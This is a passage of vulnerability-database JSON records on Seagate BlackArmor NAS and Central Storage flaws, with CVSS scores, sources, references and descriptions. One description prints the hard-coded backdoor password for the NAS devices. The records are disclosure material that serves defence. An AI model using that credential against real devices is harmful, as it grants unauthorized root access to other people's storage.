        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "id": "VAR-201802-0135",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          }
        ],
        "trust": 1.54343433
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:07:00.197000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Business NAS",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/support/by-product/business-nas/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.2,
            "url": "https://www.exploit-db.com/exploits/33159/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3206"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3206"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/20.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3206"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "date": "2018-02-23T00:00:00",
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "date": "2018-02-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-3206"
          },
          {
            "date": "2018-04-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "date": "2018-02-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "date": "2018-02-23T17:29:00.410000",
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-05856"
          },
          {
            "date": "2018-03-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-71145"
          },
          {
            "date": "2018-03-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-3206"
          },
          {
            "date": "2018-04-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          },
          {
            "date": "2018-02-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          },
          {
            "date": "2024-11-21T02:07:40.993000",
            "db": "NVD",
            "id": "CVE-2014-3206"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS Input validation vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008529"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-608"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201802-0134

    Vulnerability from variot - Updated: 2024-11-23 22:07

    backupmgt/pre_connect_check.php in Seagate BlackArmor NAS contains a hard-coded password of '!~@##$$%FREDESWWSED' for a backdoor user. BlackArmor NAS contains a vulnerability in the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). Seagate BlackArmor NAS is a network storage server from Seagate, Inc. that provides layered protection, incremental data and system backup, recovery, and more for business-critical data. A security vulnerability exists in the backupmgt/pre_connect_check.php file in Seagate BlackArmor NAS, caused by the program using the hard-coded password ‘!~@##$$%FREDESWWSED’. There are currently no detailed vulnerability descriptions. A remote attacker can exploit this vulnerability to gain root privileges on the device.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201802-0134",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "blackarmor nas 110",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "blackarmor nas",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "technology llc blackarmor nas",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:seagate:blackarmor_nas",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          }
        ]
      },
      "cve": "CVE-2014-3205",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-3205",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-05857",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-71144",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2014-3205",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-3205",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-3205",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-05857",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201802-609",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-71144",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-3205",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "backupmgt/pre_connect_check.php in Seagate BlackArmor NAS contains a hard-coded password of \u0027!~@##$$%FREDESWWSED\u0027 for a backdoor user. BlackArmor NAS contains a vulnerability in the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). The Seagate BlackArmor NAS is a network storage server from Seagate, Inc. that provides layered protection, data incremental and system backup, recovery, and more for business-critical data. A security vulnerability exists in the backupmgt/pre_connect_check.php file in Seagate BlackArmor NAS, which was caused by the program using a hard-coded password \u2018!~@##$$%FREDESWWSED\u2019. There are currently no detailed vulnerability descriptions. A remote attacker can exploit this vulnerability to gain root privileges on the device",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3205"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-3205",
            "trust": 3.2
          },
          {
            "db": "EXPLOIT-DB",
            "id": "33159",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3205",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "id": "VAR-201802-0134",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          }
        ],
        "trust": 1.54343433
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:07:00.164000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8",
            "trust": 0.8,
            "url": "http://www.nexty-ele.com/product/detail/seagate-technology-llc/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-798",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.exploit-db.com/exploits/33159/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3205"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3205"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/798.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-3205"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "date": "2018-02-23T00:00:00",
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "date": "2018-02-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-3205"
          },
          {
            "date": "2018-04-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "date": "2018-02-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "date": "2018-02-23T17:29:00.333000",
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-05857"
          },
          {
            "date": "2018-03-18T00:00:00",
            "db": "VULHUB",
            "id": "VHN-71144"
          },
          {
            "date": "2018-03-18T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-3205"
          },
          {
            "date": "2018-04-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          },
          {
            "date": "2018-08-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          },
          {
            "date": "2024-11-21T02:07:40.513000",
            "db": "NVD",
            "id": "CVE-2014-3205"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "BlackArmor NAS Vulnerabilities related to the use of hard-coded credentials",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008528"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-609"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1979

    Vulnerability from variot - Updated: 2022-05-17 02:09

    Seagate Central Storage is a home network hard drive made by Seagate, suitable for home and small office use.

    Seagate Central Storage has a remote code execution vulnerability that could be exploited by an attacker to execute code.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1979",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "central storage \u003c=seagate-hs-update-201509160008f",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2020-02702",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "CNVD",
                "id": "CNVD-2020-02702",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate Central Storage is a home network hard drive made by Seagate, suitable for home and small office use.\n\nSeagate Central Storage has a remote code execution vulnerability that could be exploited by an attacker to execute code.",
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ],
        "trust": 0.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "SEEBUG",
            "id": "SSVID-98127",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "id": "VAR-202001-1979",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02702"
          }
        ]
      },
      "last_update_date": "2022-05-17T02:09:42.513000Z",
      "references": {
        "@context": {
